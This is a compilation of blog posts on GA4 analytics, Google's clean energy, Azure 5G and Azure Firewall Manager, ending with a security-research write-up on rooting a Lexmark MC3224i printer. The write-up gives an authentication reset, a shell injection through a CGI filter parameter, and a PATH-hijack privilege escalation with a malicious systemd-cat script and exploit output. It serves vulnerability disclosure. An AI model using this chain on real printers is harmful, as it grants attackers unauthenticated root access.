Google Analytics 4 vs Universal Analytics: Full Comparison 2022

Do you want to know what’s new in Google Analytics 4? How is GA4 different from Universal Analytics?

There’s a lot that’s changed in the new Google Analytics 4 platform including the navigation. Google has added new features and removed a number of reports you’re familiar with. And that means we’ll need to relearn the platform.

In this guide, we’ll detail the differences between Google Analytics 4 (GA4) vs. Universal Analytics (UA) so that you’re prepared to make the switch.

If you haven’t already switched to Google Analytics 4, we have an easy step-by-step guide you can follow: How to Set Up Google Analytics 4 in WordPress.

What’s New Only in Google Analytics 4?

In this section, we’re detailing the things that are new in GA4 that aren’t present in Universal Analytics at all. A little later, we’ll go into depth about all the changes you need to know about.

  1. Creating and Editing Events: GA4 brings about a revolutionary change in the way you track events. You can create a custom event and modify events right inside your GA4 property. This isn’t possible with Universal Analytics unless you write code to create a custom event.
  2. Conversion Events: Conversion goals are being replaced with conversion events. You can simply mark or unmark an event to start tracking it as a conversion. There’s an easy toggle switch to do this. GA4 even lets you create conversion events ahead of time before the event takes place.
  3. Data Streams: UA lets you connect your website’s URL to a view. These views let you filter data. So for instance, you can create a filter in a UA view to exclude certain IP addresses from reports. GA4 uses data streams instead of views.
  4. Data filters:  Now you can add data filters to include or exclude traffic internal and developer traffic from your GA4 reports.
  5. Google Analytics Intelligence: You can delete search queries from your search history to fine-tune your recommendations.
  6. Explorations and Templates: There’s a new Explore item in the menu that takes you to the Explorations page and Template gallery. Explorations give you a deeper understanding of your data. And there are report templates that you can use.
  7. Debug View: There’s a built-in visual debugging tool which is awesome news for developers and business owners. With this mode, you can get a real-time view of events displayed on a vertical timeline graph. You can see events for the past 30 minutes as well as the past 60 seconds.
  8. BigQuery linking: You can now link your GA4 account with your BigQuery account. This will let you run business intelligence tasks on your analytics property using BigQuery tools.

While this is what’s unique to GA4, there are a lot more changes than this. But first, let’s take a look at what’s gone from the Universal Analytics platform that we’re all familiar with.

What’s Missing in Google Analytics 4?

Google Analytics 4 has done away with some of the old concepts. These include:

  1. Views and Filters: As we mentioned, GA4 is not using Data Streams and we explain this in depth a bit later. So you won’t be able to create a view and related filters. Once you convert your UA property to GA4, you’ll be able to access a read-only list of UA filters under Admin > Account > All Filters.
  2. Customization (menu): UA properties have a customization menu for options to create dashboards, create custom reports, save existing reports, and create custom alerts. Below are the UA customization options, along with their GA4 equivalent.
    • Dashboards: At the time of writing this, there isn’t a way to create a custom GA4 dashboard.
    • Custom reports: GA4 has the Explorations page instead where you can create custom reports.
    • Saved reports: When you create a report in Explorations, it is automatically saved for you.
    • Custom alerts: Inside custom Insights, which is a new feature in GA4, you can set custom alerts.
  3. Google Search Console linking: There isn’t a way to link Google Search Console with a GA4 property at the time of writing.
  4. Bounce rate: One of the most tracked metrics – the bounce rate – is gone. It’s likely that this has been replaced with Engagement Metrics.
  5. Conversion Goals: In UA, you could create conversion goals under Views. But since views are gone, so are conversion goals. However, you can create conversion events to essentially track the same thing.

Now that you know what’s new and what’s missing in GA4, we’ll take you through an in-depth tour of the new GA4 platform.

Google Analytics 4 vs Universal Analytics

Below, we’ll be covering the main differences between GA4 and UA. We’ve created this table of contents for you to easily navigate the comparison guide:

Feel free to use the quick links to skip ahead to the section that interests you the most.

New Mobile Analytics

A major difference between GA4 and UA is that the new GA4 platform will also support mobile app analytics.

In fact, it was originally called “Mobile + Web”.

UA only tracked web analytics so it was difficult for businesses with apps to get an accurate outlook on their performance and digital marketing efforts.

Now with GA4 data model, you’ll be able to track both your website and app. You can set up a data stream for Android and iOS.

GA4 data streams

There’s also added functionality to create custom campaigns to collect information about which mediums/referrals are sending you the most traffic. This will show you where your campaigns get the most traction so that you can optimize your strategies in the future.

Easy User ID Tracking

Turning on user ID tracking in UA was quite a task. But that’s all been simplified in GA4 with the new measurement model. You simply need to navigate to Admin » Property Settings » Reporting Identity tab.

reporting identity in GA4

You can choose between Blended and Observed mode. Select the one you want and save your changes. That’s it.

In GA4, the reporting interface remains familiar and the navigation menu is still on the left! That keeps things familiar but there are quite a few menu items that have changed.

First, there are only 4 high-level menu items right now. Google may add more as the platform is further developed.

GA4 main menu

Next, each menu item has a collapsed view. You can expand each item by clicking on it.

Now when you click on the submenu items, it will expand the menu to reveal more sub menus.

Submenu in ga4

In GA4, you’ll see familiar menu items you use for SEO and other purposes but in different locations. Here are the notable changes:

  • Realtime is under Reports
  • Audience(s) is under Configure
  • Acquisition is under Reports » Life cycle
  • Conversions is under Configure

GA4 also comes with completely new menu items as listed below:

  • Reports snapshot
  • Engagement
  • Monetization
  • Retention
  • Library
  • Custom definitions
  • DebugView

Measurement ID vs Tracking ID

Universal Analytics uses a Tracking ID that has a capital UA, a hyphen, a 7-digit tracking code followed by another hyphen, and a number. Like this: UA-1234567-1.

The last number is a sequential number starting from 1 that maps to a specific property in your Google Analytics account. So if you set up a second Google Analytics property, the new code will change to UA-1234567-2.

You can find the Tracking ID for a Universal Analytics property under Admin » Property column. Navigate to Property Settings » Tracking ID tab where you can see your UA tracking ID.

In GA4, you’ll see a Measurement ID instead of a Tracking ID. This starts with a capital G, a hyphen followed by a 10-character code.

GA4 stream measurement id

It would look like this: G-SV0GT32HNZ.

To find your GA4 Measurement ID, go to Admin » Property » Data Streams. Click on a data stream. You’ll see your Measurement ID in the stream details after the Stream URL and Stream Name.

Data Streams vs Views

In UA, you could connect your website’s URL to a view. UA views are mostly used to filter data. So for instance, you can create a filter in a UA view to exclude certain IP addresses from reports.

GA4 uses data streams instead. You’ll need to connect your website’s URL to a data stream.

But don’t be mistaken, they are not the same as views.

Also, you can’t create a filter in GA4. In case your property was converted from UA to GA4, then you can find a read-only list of UA filters under Admin » Account » All Filters.

read-only-ua-view-filters

Now Google defines a data stream as:

“A flow of data from your website or app to Analytics. There are 3 types of data stream: Web (for websites), iOS (for iOS apps), and Android (for Android apps).”

You can use your data stream to find your measurement ID and global site tag code snippet. You can also enable enhanced measurements such as your page views, scrolls, and outbound clicks.

data streams in ga4

In a data stream, you can do the following:

  • Set up a list of domains for cross-domain tracking
  • Create a set of rules for defining internal traffic rules
  • Put together a list of domains to exclude from tracking

Data streams will make a lot of things easier. But there are 2 things that you need to be aware of. First, once you create a data stream, there’s no way to edit it. And if you delete a data stream, you can’t undo this action.

Events vs. Hit Types

UA tracks data by hit types which is essentially an interaction that results in data being sent to Analytics. This includes page hits, event hits, eCommerce hits, and social interaction hits.

GA4 moves away from the concept of hit types. Instead, it’s event-based meaning every interaction is captured as an event. This means everything including page, events, eCommerce transactions, social, and app view hits are all captured as events.

There’s also no option for creating conversion goals. But GA4 lets you flag or mark an event as a conversion with the flip of a toggle switch.

Toggle conversions on in GA4

This is essentially the same thing as creating a conversion goal in Universal Analytics. You can also create new conversion events ahead of time before those events actually take place.

In GA4, Google organizes events into 4 categories and recommends that you use them in this order:

1. Automatically collected

In the first event category, there’s no option to turn on any setting for tracking events so you don’t need to activate anything here. Google will automatically collect data on these events:

  • first_visit – the first visit to a website or Android instant app
  • session_start – the time when a visitor opens a web page or app
  • user_engagement – when a session lasts longer than 10 seconds or had 1 or more conversions or had 2 or more page views

Keep in mind that we’re only at the start of GA4. With Google’s ever-advancing and machine-learning technology, more automatically collected events may be added as the platform progresses.

2. Enhanced measurement

In this section, you don’t need to write any code but there are settings to turn on enhanced measurements. This will give you an extra set of automatically collected events.

To enable this data collection, you need to turn on the Enhanced measurement setting in your Data Stream.

enhanced measurement in ga4

Then you’ll see more enhanced measurement events that include:

  • page_view: a page-load in the browser or a browser history state change
  • click:  a click on an outbound link that goes to an external site
  • file-download: a click that triggers a file download
  • scroll: the first time a visitor scrolls to the bottom of a page

3. Recommended

These GA4 events are recommended but aren’t automatically collected in GA4 so you’ll need to enable them if you want to track them.

We suggest you check out what is in the recommended events and turn on tracking for what you need. This can include signups, logins, and purchases.

Before we move to custom events, if you don’t see these 3 event types – automatically collected, enhanced measurement, and recommended – in your dashboard, you should ideally create a custom event for it.

4. Custom

Custom events let you set up tracking for any event that doesn’t fall into the above 3 categories. You can create and modify your events. So for instance, you can create custom events to track menu clicks.

You can design and write custom code to enable tracking for the event you want. But there is no guarantee that Google will support your custom metrics and events.

No Bounce Rate

The bounce rate metric has vanished! It’s been suggested that Google wants to focus on users that stay on your website rather than the ones that leave.

So this has likely been replaced with engagement rate metrics to collect more data on user interactions and engaged sessions.

No Custom Reports

UA properties have a customization menu for options to create dashboards, create custom reports, save existing reports, and create custom alerts.

A lot of this has changed in GA4. To make it easier for you to understand, here are the UA metrics and their GA4 equivalents:

  • Custom reports can be found in the Explorations page.
  • Saved reports are automatically created when you run an Exploration.
  • Custom alerts can be set up inside custom Insights from the GA4 home page.

One more thing to note is that you also won’t find a way to link Google Search Console with a GA4 property (at the time of writing). And that’s all the key differences between Universal Analytics and Google Analytics 4.

Now you may be wondering whether you HAVE TO make the switch to GA4. A lot of our users have been asking us this question so we’ll tell you quickly what you need to do.

Do I Have To Switch to GA4?

Google will retire Universal Analytics in July 2023. You’ll have access to your UA data for some time but all new data will flow into GA4. If you have a US property set up, you’ll see this warning in your dashboard:

universal analytics warning

So you have to set up a GA4 property sooner or later and we recommend that you do it sooner. This is because your UA data won’t be transferred to GA4. You have to start afresh.

You can set up your GA4 property now and let it collect data. In the meantime, you can continue to use Universal Analytics and use the time to learn the new GA4 platform. Then when we’re all forced to make the switch, you’ll have plenty of historical data in your GA4 property.

If you haven’t set up your Google Analytics 4 property yet, we’ve compiled an easy step-by step guide for you: How to Set Up Google Analytics 4 in WordPress.

Want to skip the guide and use a tool? Then MonsterInsights is the best to set up GA4. It even lets you create dual tracking profiles so you can have both UA and GA4 running simultaneously.

Get MonsterInsights Now »

After setting up GA4, you can go deeper into your data with these guides:

These posts will help you track your users and their activity on your site so that you can get more valuable insights and analytics data to improve your site’s performance.

Source :
https://www.isitwp.com/google-analytics-4-vs-universal-analytics/

Five years of 100% renewable energy – and a look ahead to a 24/7 carbon-free future

Google operates the cleanest cloud in the industry, and we have long been a leading champion of clean energy around the world. Since we began purchasing renewable energy in 2010, Google has been responsible for more than 60 new clean energy projects with a combined capacity of over 7 gigawatts — about the same as 20 million solar panels. Our long-term support for clean energy projects has contributed to the rapid growth of the industry, remarkable declines in the cost of solar and wind power, and innovative new contracting models and industry partnerships to accelerate corporate clean energy procurement.

Global Corporate PPA Volumes - Chart [June 2022].jpg

In 2021, we were the only major cloud provider to match 100% of the electricity consumption of our operations with renewable energy purchases – a goal we’ve accomplished for the past five years. This establishes Google Cloud as the cleanest cloud in the industry, and is particularly exciting given the rapid expansion of computing conducted in our data centers over the same period. This required significantly ramping up our global renewable energy purchasing: in 2021 alone we signed agreements to buy power from new renewable energy projects with a combined capacity of nearly 1300 MW – expanding our global portfolio by almost 25%.

A new frontier: 24/7 Carbon-Free Energy

Matching our annual energy consumption with renewable energy purchases has been an important step in our sustainability journey, but there are still regions and times of day where clean energy is unavailable and we are forced to rely on fossil fuels to meet our electricity needs. That is why we are now working towards our moonshot goal of operating on 24/7 carbon-free energy (CFE) by 2030, the last step in our journey to fully decarbonize Google’s global operations.

https://youtube.com/watch?v=YhSSW9LAUyw%3Fenablejsapi%3D1%26

Operating on 24/7 CFE is a far more complex and technically challenging goal than matching our annual global energy use with renewable energy purchases. It means matching our electricity demand with carbon-free energy supply every hour of every day, in every region where we operate. No company has achieved this before, and there is no playbook for achieving this.

In the spirit of transparency, today we are releasing the 2021 carbon-free energy percentages (CFE%) for each of Google’s data centers. Globally, Google operated at 66%1 CFE in 2021 – 5% higher than 2019, but 1% lower than 2020. We expected this kind of short-term fluctuation: building new clean energy is a multi-year process, and our near-term priority is to build strong foundations for long-term CFE growth.

2021 CFE% Clocks - Global Map.jpg

Our largest percentage increases were at our data centers in Chile, at 4%, and Ohio and Virginia, at 4%. In other regions, we encountered significant new headwinds, including a lack of available renewable energy supply and delays to CFE construction due to supply chain disruptions and interconnection challenges. Notably, we also saw flat or declining CFE percentages on the majority of the grids where we operate, underscoring the need for more ambitious action to accelerate grid-level decarbonization everywhere. This is an enormous challenge that requires holistic and long-term solutions, and we are working with our partners across government, industry, and civil society to build a global movement to drive progress at the speed and scale required.

As we work to operate on 24/7 carbon-free energy by 2030, we remain confident in our long-term trajectory and are increasing our focus on regions and times of day where carbon-free energy is not readily available due to resource constraints, policy barriers, or market obstacles. We are building solutions to fill these gaps, including: 

  • New approaches to buying diverse portfolios of carbon-free energy
  • Projects to advance next-generation technologies like geothermal and batteries
  • A first-of-its kind carbon-intelligent computing platform to maximize the reduction in grid-level CO2 emissions
  • Advanced methods for tracking clean energy and maximizing the economic value of clean energy projects
  • Expanded efforts to advocate for public policies that accelerate grid-level decarbonization 

Getting to 24/7 CFE won’t be easy, but we’re optimistic for the future. Our CFE goal is part of our third decade of climate action and company goal of reaching net-zero emissions across our operations and value chain, including our consumer hardware products, by 2030. We aim to reduce the majority of our emissions (versus our 2019 baseline) before 2030, and plan to invest in carbon removal solutions to neutralize our remaining emissions. 

We will continue to share our progress and lessons as we work towards our goal, and to work with our partners to accelerate the global transition to a prosperous, carbon-free future.

Source :
https://cloud.google.com/blog/topics/sustainability/5-years-of-100-percent-renewable-energy

Azure powers rapid deployment of private 4G and 5G networks

As the cloud continues to expand into a ubiquitous and highly distributed fabric, a new breed of application is emerging: Modern Connected Applications. We define these new offerings as network-intelligent applications at the edge, powered by 5G, and enabled by programmable interfaces that give developer access to network resources. Along with internet of things (IoT) and real-time AI, 5G is enabling this new app paradigm, unlocking new services and business models for enterprises, while accelerating their network and IT transformation.

At Mobile World Congress this year, Microsoft announced a significant step towards helping enterprises in this journey: Azure Private 5G Core, available as a part of the Azure private multi-access edge compute (MEC) solution. Azure Private 5G Core enables operators and system integrators (SIs) to provide a simple, scalable, and secure deployment of private 4G and 5G networks on small footprint infrastructure, at the enterprise edge.

This blog dives a little deeper into the fundamentals of the service and highlights some extensions that enterprises can leverage to gain more visibility and control over their private network. It also includes a use case of an early deployment of Azure Kubernetes Services (AKS) on an edge platform, leveraged by the Azure Private 5G Core to rapidly deploy such networks.

Building simple, scalable, and secure private networks

Azure Private 5G Core dramatically simplifies the deployment and operation of private networks. With just a few clicks, organizations can deploy a customized set of selectable 5G core functions, radio access network (RAN), and applications on a small edge-compute platform, at thousands of locations. Built-in automation delivers security patches, assures compliance, and performs audits and reporting. Enterprises benefit from a consistent management experience and improved service assurance experience, with all logs and metrics from cloud to edge available for viewing within Azure dashboards.

Enterprises need the highest level of security to connect their mission critical operations. Azure Private 5G Core makes this possible by natively integrating into a broad range of Azure capabilities. With Azure Arc, we provide seamless and secure connectivity from an on-premises edge platform into the Azure cloud. With Azure role-based access control (RBAC), administrators can author policies and define privileges that will allow an application to access all necessary resources. Likewise, users can be given appropriate access to manage all resources in a resource group, such as virtual machines, websites, and subnets. Our Zero Trust security frameworks are integrated from devices to the cloud to keep users and data secure. And our complete, “full-stack” solution (hardware, host and guest operating system, hypervisor, AKS, packet core, IoT Edge Runtime for applications, and more) meets standard Azure privacy and compliance benchmarks in the cloud and on the enterprise edge, meaning that data privacy requirements are adhered to in each geographic region.

Deploying private 5G networks in minutes

Microsoft partner Inventec is a leading design manufacturer of enterprise-class technology solutions like laptops, servers, and wireless communication products. The company has been quick to see the potential benefit in transforming its own world-class manufacturing sites into 5G smart factories to fully utilize the power of AI and IoT.

In a compelling example of rapid private 5G network deployment, Inventec recently installed our Azure private MEC solution in their Taiwan smart factory. It took only 56 minutes to fully deploy the Azure Private 5G Core and connect it to 5G access points that served multiple 5G endpoints—a significant reduction from the months that enterprises have come to expect. Azure Private 5G Core leverages Azure Arc and Azure Kubernetes Service on-prem to provide security and manageability for the entire core network stack. Figures 1 and 2 below show snapshots from the trial.

Logs with time stamps showing start and completion of the core network deployment.

Figure 1: Screenshot of logs with time stamps showing start and completion of the core network deployment.

Trial showing one access point successfully connected to seven endpoints.

Figure 2: Screenshot from the trial showing one access point successfully connected to seven endpoints.

Inventec is developing applications for manufacturing use-cases that leverage private 5G networks and Microsoft’s Azure Private 5G Core. Examples of these high-value MEC use cases include Automatic Optical Inspection (AOI), facial recognition, and security surveillance systems.

Extending enterprise control and visibility from the 5G core

Through close integration with other elements of the Azure private MEC solution, our Azure Private 5G Core essentially acts as an enterprise “control point” for private wireless networks. Through comprehensive APIs, the Azure Private 5G Core can extend visibility into the performance of connected network elements, simplify the provisioning of subscriber identity modules (SIMs) for end devices, secure private wireless deployments, and offer 5G connectivity between cloud services (like IoT Hub) and associated on-premises devices.

Azure Private 5G Core is a central control point for private wireless networks.

Figure 3: Azure Private 5G Core is a central control point for private wireless networks.

Customers, developers, and partners are finding value today with a number of early integrations with both Azure and third-party services that include:

  • Plug and play RAN: Azure private MEC offers a choice of 4G or 5G Standalone radio access network (RAN) partners that integrate directly with the Azure Private 5G Core. By integrating RAN monitoring with the Azure Private 5G Core, RAN performance can be made visible through the Azure management portal. Our RAN partners are also onboarding their Element Management System (EMS) and Service Management and Orchestrator (SMO) products to Azure, simplifying the deployment processes and have a framework for closed-loop radio performance automation.
  • Azure Arc managed edge: The Azure Private 5G Core takes advantage of the security and reliability capabilities of Azure Arc-enabled Azure Kubernetes Service running on Azure Stack Edge Pro. These include policy definitions with Azure Policy for Kubernetes, simplified access to AKS clusters for High Availability with Cluster Connect and fine-grained identity and access management with Azure RBAC. 
  • Device and Profile Management: Azure Private 5G Core APIs integrate with SIM management services to securely provision the 5G devices with appropriate profiles. In addition, integration with Azure IoT Hub enables unified management of all connected IoT devices across an enterprise and provides a message hub for IoT telemetry data. 
  • Localized ISV MEC applications: Low-latency MEC applications benefit from running side-by-side with core network functions on the common (Azure private MEC) edge-compute platform. By integrating tightly with the Azure Private 5G Core using Azure Resource Manager APIs, third-party applications can configure network resources and devices. Applications offered by partners are available in, and deployable from the Azure Marketplace.

It’s easy to get started with Azure private MEC

As innovative use cases for private wireless networks continue to develop and industry 4.0 transformation accelerates, we welcome ISVs, platform partners, operators, and SIs to learn more about Azure private MEC.

  • Application ISVs interested in deploying their industry or horizontal solutions on Azure should begin by onboarding their applications to Azure Marketplace.
  • Platform partners, operators, and SIs interested in partnering with Microsoft to deploy or integrate with private MEC can get started by reaching out to the Azure private MEC Team.

Microsoft is committed to helping organizations innovate from the cloud, to the edge, and to space—offering the platform and ecosystem strong enough to support the vision and vast potential of 5G. As the cloud continues to expand and a new breed of modern connected apps at the edge emerges, the growth and transformation opportunities for enterprises will be profound. Learn more about how Microsoft is helping developers embrace 5G.

Source :
https://azure.microsoft.com/en-us/blog/azure-powers-rapid-deployment-of-private-4g-and-5g-networks/

Simplify and centralize network security management with Azure Firewall Manager

We are excited to share that Azure Web Application Firewall (WAF) policy and Azure DDoS Protection plan management in Microsoft Azure Firewall Manager is now generally available.

With an increasing need to secure cloud deployments through a Zero Trust approach, the ability to manage network security policies and resources in one central place is a key security measure.

Today, you can now centrally manage Azure Web Application Firewall (WAF) to provide Layer 7 application security to your application delivery platforms, Azure Front Door, and Azure Application Gateway, in your networks and across subscriptions. You can also configure DDoS Protection Standard for protecting your virtual networks from Layer 3 and Layer 4 attacks.

Azure Firewall Manager is a central network security policy and route management service that allows administrators and organizations to protect their networks and cloud platforms at a scale, all in one central place. 

Azure Web Application Firewall is a cloud-native web application firewall (WAF) service that provides powerful protection for web apps from common hacking techniques such as SQL injection and security vulnerabilities such as cross-site scripting.

Azure DDoS Protection Standard provides enhanced Distributed Denial-of-Service (DDoS) mitigation features to defend against DDoS attacks. It is automatically tuned to protect all public IP addresses in virtual networks. Protection is simple to enable on any new or existing virtual network and does not require any application or resource changes. 

By utilizing both WAF policy and DDoS protection in your network, this provides multi-layered protection across all your essential workloads and applications.

WAF policy and DDoS Protection plan management are an addition to Azure Firewall management in Azure Firewall Manager.

Centrally protect your application delivery platforms using WAF policies 

In Azure Firewall Manager, you can now manage and protect your Azure Front Door or Application Gateway deployments by associating WAF policies, at scale. This allows you to view all your key deployments in one central place, alongside Azure Firewall deployments and DDoS Protection plans.

Associating a WAF policy to an Azure Front Door

Upgrade from WAF configuration to WAF policy

In addition, the platform supports administrators to upgrade from a WAF config to WAF policies for Application Gateways, by selecting the service and Upgrade from WAF configuration. This allows for a more seamless process for migrating to WAF policies, which supports WAF policy settings, managed rulesets, exclusions, and disabled rule-groups.

As a note, all WAF configurations that were previously created in Application Gateway can be done through WAF policy.

Upgrading a WAF configuration to WAF policy

Manage DDoS Protection plans for your virtual networks

You can enable DDoS Protection Plan Standard on your virtual networks listed in Azure Firewall Manager, across subscriptions and regions. This allows you to see which virtual networks have Azure Firewall and/or DDoS protection in a single place.

 Figure 3: Enabling DDoS Protection Standard on a virtual network in Azure Firewall Manager

View and create WAF policies and DDoS Protection Plans in Azure Firewall Manager

You can view and create WAF policies and DDoS Protection Plans from the Azure Firewall Manager experience, alongside Azure Firewall policies.

In addition, you can import existing WAF policies to create a new WAF policy, so you do not need to start from scratch if you want to maintain similar settings.

Figure 4: View of Web Application Firewall Policies in Azure Firewall Manager
Figure 5: View of DDoS Protection Plans in Azure Firewall Manager

Monitor your overall network security posture

Azure Firewall Manager provides monitoring of your overall network security posture. Here, you can easily see which virtual networks and virtual hubs are protected by Azure Firewall, a third-party security provider, or DDoS Protection Standard. This overview can help you identify and prioritize any security gaps that are in your Azure environment, across subscriptions or for the whole tenant.

Figure 6: Monitoring page in Azure Firewall Manager

Coming soon, you’ll also be able to view your Application Gateway and Azure Front Door monitors, for a full network security overview.

Learn more

To learn more about these features in Azure Firewall Manager, visit the Manage Web Application Firewall policies tutorial, WAF on Application Gateway documentation, and WAF on Azure Front Door documentation. For DDoS information, visit the Configure Azure DDoS Protection Plan using Azure Firewall Manager tutorial and Azure DDoS Protection documentation.

To learn more about Azure Firewall Manager, please visit the Azure Firewall Manager home page.

Source :
https://azure.microsoft.com/en-us/blog/simplify-and-centralize-network-security-management-with-azure-firewall-manager/

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.

Overview

ProductLexmark MC3224
Affected Firmware Versions
(without claim for completeness)
CXLBL.075.272 (2021-07-29)
CXLBL.075.281 (2021-10-14)
Fixed Firmware VersionCXLBL.076.294 (CVE-2021-44735) Note: Users must implement a workaround to address CVE-2021-44736, see Lexmark Security Alert
CVECVE-2021-44735 (Shell Command Injection)
CVE-2021-44736 (Authentication Reset)
Root CausesAuthentication Bypass, Shell Command Injection, Insecure SUID Binary
ImpactUnauthenticated Remote Code Execution (RCE) as root
ResearchersHanno Heinrichs, Lukas Kupczyk
Lexmark Resourceshttps[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf
https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44736.pdf

Step #1: Increasing Attack Surface via Authentication Reset

Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a vast amount of actions through the web interface. One of these is Sanitize all information on nonvolatile memory. It can be found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interfacedestpath and filter are extracted and populated from that data by using sed:

read data

remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
    remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
    method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
    auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the value -F specified in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:

fmt=""
args=""
if [ ${remove} -ne 0 ]; then
    fmt="${fmt}b"
    args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
    fmt="${fmt}s"
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        fmt="${fmt}s"
        args="${args} filter \"${filter}\""
    fi
    if [ ${auto} -ne 0 ]; then
        fmt="${fmt}b"
        args="${args} auto 1"
    else
        fmt="${fmt}s"
        args="${args} dest ${dest}"
    fi
fi
[...]

At the end of the script, the resulting args value is used in an eval statement:

[...]
resp=""
if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
    submitted=1
[...]

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __uid_t euid; // r0

  euid = geteuid();
  if ( setuid(euid) )
    perror("setuid");
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);
}

Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "$@"
}

sd_journal_print "Start! params: '$@'"

[...]

The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
#!/bin/sh
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-setlogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

root@ET788C773C9E20:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect_selogs_wrapper SUID again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.

Exploit

An exploit combining the three vulnerabilities to gain unauthenticated code execution as root  has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., setup wizard has been completed) or it is password-less (i.e., authentication reset already executed earlier or setup wizard not yet completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py https://10.64.23.20/ sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM',        
    'LOGIN_METHODS_WITH_CREDS']
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
